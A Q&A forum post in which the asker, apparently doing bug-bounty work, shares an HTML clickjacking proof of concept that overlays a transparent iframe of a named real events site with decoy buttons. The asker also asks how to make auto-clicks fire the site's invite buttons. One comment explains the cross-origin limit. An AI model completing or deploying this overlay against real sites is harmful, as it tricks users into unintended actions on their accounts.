1

I found a clickjacking issue in a site and the site security team said me that i would require unusual user interaction. So I wrote a code above the iframe but I was not successful in achieving it.

The site had two sensitive buttons which must be clicked to sent a invite request. And so i've added two buttons and also a demo site in iframe below.

Can you help me alter the code in a way the button which clicked is executed in the iframe present behind the actual behind.

Thanks.

<html>
<head>
        <style>
iframe { /* iframe from the victim site */
  width: 900px;
  height: 820px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}

p {
  width: 520px;
  padding: 10px;
  border: 5px solid gray;
  margin: 0;
}

</style>

    <meta http-equiv="Content-Type" content="text/html charset=UTF-8" />
    <title>Test for Clickjacking.</title>
</head>

<script type="text/javascript">

        function test(){
        //do whateven you want or remove if only want button click
       console.log('1st click')
    }

      function test2(){
        //do whateven you want or remove if only want button click
       console.log('2nd click');
    }

    window.onload = setTimeout("document.getElementById('btn').click()",3000);
    window.onload = setTimeout("document.getElementById('btn2').click()",5000);


</script>
<body>
    <div class="body-margin">
        <br>
        <button id="btn" onclick="test()">1st</button>
        <button id="btn2" onclick="test2()">2nd</button>
    </div>

<iframe src="https://www.townscript.com"></iframe>

</body>
</html>```
None_None
  • 45
  • 5
  • 1
    It seems to me that you are trying to make your code click the buttons automatically, but what you are doing is clicking *your own* buttons, not the ones in the frame. You can't control the iframe (it would be a cross-origin issue), you need to trick the user into actually performing clicks in the right places. – reed Feb 11 '21 at 14:03

0 Answers0